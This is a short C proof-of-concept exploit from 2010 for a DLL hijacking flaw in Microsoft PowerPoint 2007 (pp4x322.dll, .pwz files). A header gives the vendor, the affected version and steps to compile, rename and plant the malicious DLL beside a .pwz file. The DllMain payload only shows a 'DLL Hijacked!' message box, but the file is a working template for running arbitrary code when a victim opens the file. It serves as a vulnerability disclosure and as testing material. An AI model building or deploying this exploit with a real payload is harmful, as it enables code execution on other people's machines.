/*

 Microsoft Office PowerPoint 2007 v12.0.4518 (pp4x322.dll) DLL Hijacking Exploit

 Vendor: Microsoft Corp.
 Product Web Page: http://www.microsoft.com
 Affected Version: 12.0.4518.1014 MSO (12.0.4518.1014)

 Summary: Microsoft PowerPoint is a presentation program by Microsoft.
 It is part of the Microsoft Office suite, and runs on Microsoft Windows
 and Apple's Mac OS X operating system.

 Desc: MS PowerPoint 2007 suffers from a dll hijacking vulnerability
 that enables the attacker to execute arbitrary code on a local
 level. The vulnerable extension is .pwz thru pp4x322.dll and pp7x32.dll
 libraries.

 ----
 gcc -shared -o pp4x322.dll mspowerp.c

 Compile and rename to pp4x322.dll, create a file test.pwz and put both
 files in same dir and execute.
 ----

 Tested on Microsoft Windows XP Professional SP3 (EN)



 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
 liquidworm gmail com

 Zero Science Lab - http://www.zeroscience.mk


 25.08.2010

*/


#include <windows.h>

BOOL WINAPI DllMain (HANDLE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{

  switch (fdwReason)
  {
    case DLL_PROCESS_ATTACH:
    dll_mll();
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
    break;
  }

  return TRUE;
}

int dll_mll()
{
  MessageBox(0, "DLL Hijacked!", "DLL Message", MB_OK);
}